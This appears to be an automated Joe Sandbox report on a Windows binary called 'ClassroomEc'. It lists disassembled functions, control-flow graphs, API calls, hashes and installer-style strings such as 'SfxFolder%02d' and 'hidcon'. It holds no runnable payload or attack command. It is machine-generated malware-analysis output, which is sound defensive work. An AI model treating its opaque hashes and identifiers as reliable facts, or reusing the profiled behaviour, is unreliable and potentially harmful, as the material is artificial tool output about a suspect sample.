                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A72124
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A7214B
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A7218A
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A721BC
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A72268
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocatorDebugHeap$CurrentDirectory$_wtol
                                                                                                                                                      • String ID: ExecuteParameters$del$hidcon$shc
                                                                                                                                                      • API String ID: 1551080378-796110186
                                                                                                                                                      • Opcode ID: d07ab29fecab1d6dd4e29405ce564345baf908bb86a0ca6cb8044e35745d35c1
                                                                                                                                                      • Instruction ID: 31c626c91a92ba0ad895c8d48bfa88a62bb4824e6e50817611818819f2b3ee7a
                                                                                                                                                      • Opcode Fuzzy Hash: d07ab29fecab1d6dd4e29405ce564345baf908bb86a0ca6cb8044e35745d35c1
                                                                                                                                                      • Instruction Fuzzy Hash: 26B19DB0D002099BDB14EFA4DD52BFFB7B4BF14304F14C529E42A67292EB34A946CB91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 763 a72640-a72650 764 a72652-a72657 763->764 765 a7265c-a72669 763->765 766 a72c54-a72c57 764->766 767 a72672-a726a0 call a89ef0 call a732c0 call a72c80 765->767 768 a7266b-a7266d 765->768 775 a726a2-a726b3 call a732f0 767->775 776 a726b8-a726c6 call a710d0 767->776 768->766 775->766 781 a726d1-a726f7 call a84cd0 call a732f0 776->781 782 a726c8-a726cf 776->782 781->766 782->781 783 a726fc-a7275d call a71d50 call a89160 call a712d0 call a71d50 call a804f0 call a732c0 call a72c80 782->783 803 a7275f-a72786 call a732f0 call a84cd0 call a732f0 783->803 804 a7278b-a72791 783->804 803->766 806 a72793-a7279d 804->806 807 a7279f-a727a6 804->807 809 a727ea-a72805 call a72c80 806->809 810 a727e1-a727e7 807->810 811 a727a8-a727dc call a732f0 call a84cd0 call a732f0 807->811 818 a72807-a7282e call a732f0 call a84cd0 call a732f0 809->818 819 a72833-a7285e call a72c80 809->819 810->809 811->766 818->766 829 a72860-a72887 call a732f0 call a84cd0 call a732f0 819->829 830 a7288c-a7289d 819->830 829->766 834 a7289f-a728a6 830->834 835 a728aa-a728c5 GetLocalTime SystemTimeToFileTime 830->835 839 a728c7-a728d6 834->839 840 a728a8-a7290c call a732f0 call a84cd0 call a732f0 834->840 841 a72911-a72918 835->841 839->841 840->766 844 a7291a-a72930 call a712d0 call a74c30 841->844 845 a72998-a729c0 call a712d0 call a73c80 841->845 865 a72932-a72966 call a732f0 call a84cd0 call a732f0 844->865 866 a7296b-a72993 call a732f0 call a84cd0 call a732f0 844->866 862 a729c2-a729c9 845->862 863 a729fa-a72a35 GetLastError call a732f0 call a84cd0 call a732f0 845->863 867 a729cd-a729f5 call a732f0 call a84cd0 call a732f0 862->867 868 a729cb-a72a51 ??2@YAPAXI@Z 862->868 863->766 865->766 866->766 867->766 877 a72a66 868->877 878 a72a53-a72a64 call a72cc0 868->878 887 a72a70-a72a9f call a7d770 call a712d0 call a73350 877->887 878->887 909 a72aa4-a72aa9 887->909 910 a72aaf-a72ada GetLastError call a72c60 call a75be0 909->910 911 a72c08-a72c4e call a73310 call a889b0 call a734f0 call a732f0 call a84cd0 call a732f0 909->911 920 a72adc-a72b24 call a84cd0 call a734f0 call a732f0 call a84cd0 call a732f0 910->920 921 a72b29-a72b48 call a716c0 call a712d0 call a74c30 910->921 911->766 920->766 941 a72b93-a72bb1 call a712d0 call a73350 921->941 942 a72b4a-a72b8e call a84cd0 call a734f0 call a732f0 call a84cd0 call a732f0 921->942 956 a72bb3-a72bfe GetLastError call a84cd0 call a734f0 call a732f0 call a84cd0 call a732f0 941->956 957 a72c00-a72c03 call a84cd0 941->957 942->766 956->766 957->911
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @
                                                                                                                                                      • API String ID: 0-2766056989
                                                                                                                                                      • Opcode ID: e89a9bf539e5bc76f4d855d7a1d1a6d7e7752adb7f2ac411502418775c5ac6a9
                                                                                                                                                      • Instruction ID: 4fef3a7a57e398acf252c4da0ebebc57da74546f8060fce55aea7792240da779
                                                                                                                                                      • Opcode Fuzzy Hash: e89a9bf539e5bc76f4d855d7a1d1a6d7e7752adb7f2ac411502418775c5ac6a9
                                                                                                                                                      • Instruction Fuzzy Hash: 56120A719102189BDF18EFA5CD91BED77B5FF58300F10C168E50A6B292EB30AA85CF91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 978 a7b950-a7b9ae call a712d0 * 2 call a7d260 call a7cc80 call a7cba0 989 a7b9b0-a7b9c8 call a7d2b0 978->989 990 a7b9cd-a7b9f2 call a7b6f0 call a7cdf0 call a84ba0 978->990 995 a7c78e-a7c794 989->995 1000 a7b9f4-a7ba14 call a7d200 call a7d2b0 990->1000 1001 a7ba19-a7ba3c call a7ccc0 990->1001 1000->995 1006 a7ba42-a7ba5a 1001->1006 1007 a7badf-a7baea 1001->1007 1012 a7ba93-a7baaa 1006->1012 1013 a7ba5c 1006->1013 1010 a7bb0d-a7bb35 call a89ef0 ??2@YAPAXI@Z 1007->1010 1011 a7baec-a7bb07 call a7cfd0 1007->1011 1026 a7bb37-a7bb4a call a7c840 1010->1026 1027 a7bb4c 1010->1027 1011->1010 1025 a7bdb7-a7be0d call a712d0 call a7d910 1011->1025 1018 a7baac-a7babb 1012->1018 1019 a7bac9 1012->1019 1016 a7ba6e-a7ba8e call a7d200 call a7d2b0 1013->1016 1017 a7ba5e-a7ba6c 1013->1017 1016->995 1017->1012 1017->1016 1018->1019 1024 a7babd-a7bac7 1018->1024 1020 a7bad3-a7bad9 1019->1020 1020->1007 1024->1020 1048 a7be13-a7be91 call a712d0 call a7c800 call a712b0 call a860b0 call a712d0 1025->1048 1049 a7c26c-a7c270 1025->1049 1031 a7bb56-a7bb93 call a86110 1026->1031 1027->1031 1039 a7bba6 1031->1039 1040 a7bb95-a7bba4 1031->1040 1041 a7bbb0-a7bbe8 1039->1041 1040->1041 1046 a7bc11-a7bc3a call a7d910 1041->1046 1047 a7bbea-a7bc0c call a7d200 call a7d2b0 1041->1047 1066 a7bc40-a7bc8f call a712d0 call a7d2d0 call a86610 1046->1066 1067 a7bd9c-a7bdb4 call a7d320 1046->1067 1047->995 1115 a7be97-a7bebe call a7d910 1048->1115 1116 a7bf8b-a7bfd2 call a734f0 call a712b0 call a860b0 call a712d0 1048->1116 1053 a7c272-a7c296 1049->1053 1054 a7c29b-a7c2bd call a7daa0 ??2@YAPAXI@Z 1049->1054 1053->1054 1062 a7c2d2 1054->1062 1063 a7c2bf-a7c2d0 call a7d350 1054->1063 1069 a7c2dc-a7c303 call a7d770 call a7d910 1062->1069 1063->1069 1091 a7bcc3-a7bcd3 call a7cb80 1066->1091 1092 a7bc91-a7bcbe call a7d300 call a7d200 call a7d2b0 1066->1092 1067->1025 1088 a7c392-a7c3bb call a7d910 1069->1088 1089 a7c309-a7c340 1069->1089 1110 a7c5b1-a7c5d5 call a85e80 call a7dc60 1088->1110 1111 a7c3c1-a7c3fc call a712b0 call a7d910 1088->1111 1103 a7c342-a7c37a call a734f0 call a7da30 call a7d200 call a7d2b0 1089->1103 1104 a7c37f-a7c38e call a86110 1089->1104 1108 a7bcd5-a7bce5 call a7d7a0 1091->1108 1109 a7bd19-a7bd29 call a7d7a0 1091->1109 1092->995 1103->995 1104->1088 1131 a7bd17 1108->1131 1132 a7bce7-a7bd12 call a7d300 call a7d200 call a7d2b0 1108->1132 1138 a7bd3c-a7bd67 call a7d300 call a7d200 call a7d2b0 1109->1138 1139 a7bd2b-a7bd3a 1109->1139 1154 a7c5e0-a7c5e6 1110->1154 1151 a7c402-a7c420 call a86de0 1111->1151 1152 a7c48a-a7c4a1 ??2@YAPAXI@Z 1111->1152 1145 a7bef0-a7bf26 call a712d0 * 2 call a94af0 1115->1145 1146 a7bec0-a7beeb call a734f0 call a7d200 call a7d2b0 1115->1146 1228 a7bfd4-a7c017 call a712d0 call a7cd10 1116->1228 1229 a7c04b-a7c0b9 call a734f0 call a7dc10 call a7dc60 1116->1229 1147 a7bd6c-a7bd97 call a7d300 1131->1147 1132->995 1138->995 1139->1138 1139->1147 1206 a7bf28-a7bf38 1145->1206 1146->995 1147->1067 1173 a7c422-a7c42f 1151->1173 1162 a7c4b6 1152->1162 1163 a7c4a3-a7c4b4 call a7d4e0 1152->1163 1166 a7c613-a7c617 1154->1166 1167 a7c5e8-a7c611 call a85ea0 call a712d0 * 2 1154->1167 1178 a7c4c0-a7c4f6 call a86110 call a7d220 1162->1178 1163->1178 1180 a7c74d-a7c788 call a804f0 call a734f0 call a7da30 call a7d200 call a7d2b0 1166->1180 1181 a7c61d-a7c62c call a712b0 1166->1181 1167->1154 1186 a7c431-a7c474 call a734f0 * 2 call a7da30 call a7d200 call a7d2b0 1173->1186 1187 a7c479-a7c488 call a86110 1173->1187 1220 a7c4fb-a7c512 ??2@YAPAXI@Z 1178->1220 1180->995 1204 a7c62e-a7c64e call a84ec0 1181->1204 1205 a7c69c-a7c6b2 call a712d0 1181->1205 1186->995 1187->1220 1204->1205 1234 a7c650-a7c667 ??2@YAPAXI@Z 1204->1234 1239 a7c6c7-a7c6ca 1205->1239 1240 a7c6b4-a7c6c5 call a712d0 1205->1240 1215 a7bf44-a7bf57 1206->1215 1216 a7bf3a 1206->1216 1215->1116 1224 a7bf59-a7bf86 call a734f0 call a7d200 call a7d2b0 1215->1224 1216->1215 1231 a7c527 1220->1231 1232 a7c514-a7c525 call a7d5d0 1220->1232 1224->995 1228->1229 1285 a7c019-a7c046 call a734f0 call a7d200 call a7d2b0 1228->1285 1290 a7c0bf-a7c0d8 call a7cc20 1229->1290 1291 a7c1dd-a7c1e1 1229->1291 1233 a7c531-a7c5ac call a85e30 call a86110 call a712d0 call a7c7a0 call a7c7c0 call a734f0 1231->1233 1232->1233 1233->1110 1246 a7c680 1234->1246 1247 a7c669-a7c67e call a7cd20 1234->1247 1253 a7c6d0-a7c701 call a712d0 call a85a00 1239->1253 1240->1253 1257 a7c68a-a7c697 call a86110 1246->1257 1247->1257 1283 a7c703-a7c74b call a734f0 call a804f0 call a734f0 call a7da30 call a7d200 call a7d2b0 1253->1283 1257->1205 1283->995 1285->995 1307 a7c11b-a7c134 call a7cbc0 1290->1307 1308 a7c0da-a7c116 call a712d0 * 3 1290->1308 1297 a7c1f6-a7c20d call a712d0 1291->1297 1298 a7c1e3-a7c1e9 1291->1298 1310 a7c213-a7c267 call a712d0 call a804f0 * 2 1297->1310 1298->1297 1303 a7c1eb-a7c1f4 1298->1303 1303->1310 1326 a7c136-a7c16c call a804f0 * 2 call a7d200 call a7d2b0 1307->1326 1327 a7c171-a7c1d5 call a712d0 * 3 1307->1327 1347 a7c1d8 1308->1347 1310->1049 1326->995 1327->1347
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: W
                                                                                                                                                      • API String ID: 0-655174618
                                                                                                                                                      • Opcode ID: 22b8f02be49cb56784ccb6d1d62d7d06005b7f78b58a8ab03e6b6d705e9ee820
                                                                                                                                                      • Instruction ID: 0f00e244baf0bc5d5b6714fd3cbaf77910bd4995578e96cbec0cfb41e8bb1b4b
                                                                                                                                                      • Opcode Fuzzy Hash: 22b8f02be49cb56784ccb6d1d62d7d06005b7f78b58a8ab03e6b6d705e9ee820
                                                                                                                                                      • Instruction Fuzzy Hash: B792B2759001289BDB68EF64CD91BEDB7B5AF58304F10C1E9E50EA7252DB30AE85CF90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1399 a76680-a7671c LoadLibraryA #17 call a7b590 call a75e70 * 6 1414 a7672d-a76734 1399->1414 1415 a767ed-a767f0 1414->1415 1416 a7673a-a76754 SHGetSpecialFolderPathW 1414->1416 1417 a7675a-a76786 wsprintfW call a736c0 1416->1417 1418 a767e8 1416->1418 1421 a7678b-a76798 1417->1421 1418->1414 1422 a767a9-a767b0 1421->1422 1422->1418 1423 a767b2-a767c5 1422->1423 1424 a767c7-a767e3 call a736c0 1423->1424 1425 a767e6 1423->1425 1424->1425 1425->1422
                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32), ref: 00A7668E
                                                                                                                                                      • #17.COMCTL32 ref: 00A76699
                                                                                                                                                        • Part of subcall function 00A75E70: GetLastError.KERNEL32 ref: 00A75EC8
                                                                                                                                                        • Part of subcall function 00A75E70: wsprintfW.USER32 ref: 00A75EDE
                                                                                                                                                        • Part of subcall function 00A75E70: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00A75EEF
                                                                                                                                                        • Part of subcall function 00A75E70: GetLastError.KERNEL32 ref: 00A75EF8
                                                                                                                                                        • Part of subcall function 00A75E70: ??2@YAPAXI@Z.MSVCRT ref: 00A75F1D
                                                                                                                                                        • Part of subcall function 00A75E70: GetEnvironmentVariableW.KERNEL32(?,?,00A7B311), ref: 00A75F43
                                                                                                                                                        • Part of subcall function 00A75E70: GetLastError.KERNEL32 ref: 00A75F52
                                                                                                                                                        • Part of subcall function 00A75E70: lstrcmpiW.KERNEL32(00000000,?), ref: 00A75F80
                                                                                                                                                        • Part of subcall function 00A75E70: ??3@YAXPAX@Z.MSVCRT ref: 00A75FA3
                                                                                                                                                        • Part of subcall function 00A75E70: SetLastError.KERNEL32(?), ref: 00A76003
                                                                                                                                                        • Part of subcall function 00A75E70: ??3@YAXPAX@Z.MSVCRT ref: 00A75FCC
                                                                                                                                                        • Part of subcall function 00A75E70: ??3@YAXPAX@Z.MSVCRT ref: 00A75FF7
                                                                                                                                                        • Part of subcall function 00A75E70: lstrlenA.KERNEL32(?), ref: 00A76067
                                                                                                                                                        • Part of subcall function 00A75E70: ??2@YAPAXI@Z.MSVCRT ref: 00A7608A
                                                                                                                                                        • Part of subcall function 00A75E70: GetLocaleInfoW.KERNELBASE(00000000,00001004,?,0000001F), ref: 00A760D3
                                                                                                                                                        • Part of subcall function 00A75E70: _wtol.MSVCRT(?), ref: 00A760E4
                                                                                                                                                        • Part of subcall function 00A75E70: MultiByteToWideChar.KERNEL32(000004E4,00000000,?,?,00000000,?), ref: 00A76117
                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000040,00000000), ref: 00A7674C
                                                                                                                                                      • wsprintfW.USER32 ref: 00A7676D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLast$??3@$??2@EnvironmentVariablewsprintf$ByteCharFolderInfoLibraryLoadLocaleMultiPathSpecialWide_wtollstrcmpilstrlen
                                                                                                                                                      • String ID: @$SfxFolder%02d$kernel32
                                                                                                                                                      • API String ID: 2629262089-574402807
                                                                                                                                                      • Opcode ID: 4636b8e672774bbc400aae3e23cc98b81a16c5b3afeb624ee840319f83123109
                                                                                                                                                      • Instruction ID: 4eee9ce6c845c87e154dbd44864f11f7f6d76479c362dc3ff7d05244e193eb21
                                                                                                                                                      • Opcode Fuzzy Hash: 4636b8e672774bbc400aae3e23cc98b81a16c5b3afeb624ee840319f83123109
                                                                                                                                                      • Instruction Fuzzy Hash: 3D31C6B5E44208AFEF10EFB0ED49B6A7374BB40308F0081AAE50D5B251EB716A95CF52
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1429 a72d40-a72d8d call a72f60 CreateThread 1432 a72d8f-a72d96 1429->1432 1433 a72dac-a72dbd 1429->1433 1434 a72d9d-a72da6 WaitForSingleObject 1432->1434 1435 a72d98 call a7b490 1432->1435 1436 a72e30-a72e3e 1433->1436 1437 a72dbf-a72dd5 1433->1437 1434->1433 1435->1434 1439 a72e44-a72e4b 1436->1439 1440 a72ec8-a72ecd 1436->1440 1441 a72dd7-a72de1 1437->1441 1442 a72e14-a72e23 call a7b300 1437->1442 1445 a72e4d-a72e60 GetExitCodeThread 1439->1445 1446 a72e68-a72e75 1439->1446 1444 a72ed1-a72ed4 1440->1444 1441->1442 1447 a72df6-a72e02 call a7b300 1441->1447 1448 a72e04-a72e10 call a7b300 1441->1448 1449 a72e12 1441->1449 1450 a72de8-a72df4 call a7b300 1441->1450 1455 a72e26-a72e2b 1442->1455 1445->1446 1457 a72e62-a72e66 1445->1457 1451 a72e77-a72e87 call a7b300 1446->1451 1452 a72e89-a72e95 1446->1452 1447->1455 1448->1455 1449->1455 1450->1455 1467 a72ebf-a72ec4 1451->1467 1463 a72e97-a72e9e 1452->1463 1464 a72ea0-a72ebc SetLastError call a7b300 1452->1464 1455->1444 1457->1446 1459 a72ec6-a72ecf 1457->1459 1459->1444 1463->1464 1463->1467 1464->1467 1467->1444
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A72F60: _DebugHeapAllocator.LIBCPMTD ref: 00A72F71
                                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00002FA0,?,00000000,?), ref: 00A72D7B
                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000288,000000FF), ref: 00A72DA6
                                                                                                                                                        • Part of subcall function 00A7B300: wvsprintfW.USER32(?,?,?), ref: 00A7B32D
                                                                                                                                                        • Part of subcall function 00A7B300: GetLastError.KERNEL32 ref: 00A7B33D
                                                                                                                                                        • Part of subcall function 00A7B300: FormatMessageW.KERNEL32(00001100,00000000,?,?,?,00000000,00000000), ref: 00A7B36C
                                                                                                                                                        • Part of subcall function 00A7B300: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00000000,?,?,00000000,00000000), ref: 00A7B393
                                                                                                                                                        • Part of subcall function 00A7B300: lstrlenW.KERNEL32(?,?,?,00000000,00000000), ref: 00A7B3A8
                                                                                                                                                        • Part of subcall function 00A7B300: lstrlenW.KERNEL32(?,?,?,00000000,00000000), ref: 00A7B3BB
                                                                                                                                                        • Part of subcall function 00A7B300: ??2@YAPAXI@Z.MSVCRT ref: 00A7B3DC
                                                                                                                                                        • Part of subcall function 00A7B300: lstrcpyW.KERNEL32(?,?), ref: 00A7B404
                                                                                                                                                        • Part of subcall function 00A7B300: lstrcpyW.KERNEL32(?,?), ref: 00A7B437
                                                                                                                                                        • Part of subcall function 00A7B300: ??3@YAXPAX@Z.MSVCRT ref: 00A7B45F
                                                                                                                                                        • Part of subcall function 00A7B300: LocalFree.KERNEL32(?), ref: 00A7B46E
                                                                                                                                                      • GetExitCodeThread.KERNELBASE(00000288,00000000), ref: 00A72E58
                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 00A72EA9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorFormatLastMessageThreadlstrcpylstrlen$??2@??3@AllocatorCodeCreateDebugExitFreeHeapLocalObjectSingleWaitwvsprintf
                                                                                                                                                      • String ID: i
                                                                                                                                                      • API String ID: 974866615-3865851505
                                                                                                                                                      • Opcode ID: 98b9f7a494858d350d6103c2d3ad143c1abd09f31e293a9ac05f99491dc1c33c
                                                                                                                                                      • Instruction ID: 0390908f10b8a6d76a443f379160f200de286df96f466f0a22087c80ff0468c7
                                                                                                                                                      • Opcode Fuzzy Hash: 98b9f7a494858d350d6103c2d3ad143c1abd09f31e293a9ac05f99491dc1c33c
                                                                                                                                                      • Instruction Fuzzy Hash: D141CFB5A44208EBD720DBD8ED06B693BB0FB84305F10C21AF50D5A2D1DB7069C5DB62
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A735B0: _DebugHeapAllocator.LIBCPMTD ref: 00A735C0
                                                                                                                                                        • Part of subcall function 00A735B0: wcsncpy.MSVCRT ref: 00A735E4
                                                                                                                                                      • GetTempPathW.KERNEL32(00000001,00000000,00000002), ref: 00A737AB
                                                                                                                                                      • GetTempPathW.KERNEL32(-00000001,00000000,-00000001,00000000), ref: 00A737DB
                                                                                                                                                      • wsprintfW.USER32 ref: 00A73833
                                                                                                                                                      • GetFileAttributesW.KERNELBASE(00000000), ref: 00A7384D
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A73863
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocatorDebugHeapPathTemp$AttributesFilewcsncpywsprintf
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3320338524-0
                                                                                                                                                      • Opcode ID: 273f3a6e22fbfeadde3b4f830dbeabaa54ff98c68b74e43760481de76d54f3f7
                                                                                                                                                      • Instruction ID: 2328ac48eec3a4293d6843a03b93b4cad87dbe33cc55f5fb8155f3ad8bd335cd
                                                                                                                                                      • Opcode Fuzzy Hash: 273f3a6e22fbfeadde3b4f830dbeabaa54ff98c68b74e43760481de76d54f3f7
                                                                                                                                                      • Instruction Fuzzy Hash: BB21FE71900109AFCF04EFA8CE92AFE77B4AF44305F10C119E509B7191EB706B45DBA2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1569 a73d20-a73d34 CreateDirectoryW 1570 a73d36-a73d46 GetLastError 1569->1570 1571 a73d7f 1569->1571 1572 a73d56-a73d67 GetFileAttributesW 1570->1572 1573 a73d48-a73d54 SetLastError 1570->1573 1574 a73d84-a73d87 1571->1574 1572->1571 1575 a73d69-a73d6f 1572->1575 1573->1574 1575->1571 1576 a73d71-a73d7d SetLastError 1575->1576 1576->1574
                                                                                                                                                      APIs
                                                                                                                                                      • CreateDirectoryW.KERNELBASE(00A74DBB,00000000,00A74DBB,00000000,?,?,?,?,?,?,?,?,?,?,?,00A72B43), ref: 00A73D2C
                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00A72B43,00000000,00000000,?), ref: 00A73D36
                                                                                                                                                      • SetLastError.KERNEL32(000000B7), ref: 00A73D4C
                                                                                                                                                      • GetFileAttributesW.KERNELBASE(000000B7), ref: 00A73D5A
                                                                                                                                                      • SetLastError.KERNEL32(000000B7), ref: 00A73D75
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLast$AttributesCreateDirectoryFile
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 635176117-0
                                                                                                                                                      • Opcode ID: 52dd6a08285c4acb4c4a926ba66bbf9f53f47e780932e4fc3d9f7005511399f5
                                                                                                                                                      • Instruction ID: cad3d46502365b07a13c790b76397ed00fe156da45df25003e7c05a0bdef9504
                                                                                                                                                      • Opcode Fuzzy Hash: 52dd6a08285c4acb4c4a926ba66bbf9f53f47e780932e4fc3d9f7005511399f5
                                                                                                                                                      • Instruction Fuzzy Hash: 2BF03135A00208FFDF20EBF8DC4C6AE7B74AB08345F11C959E81997151DB359A51DB50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
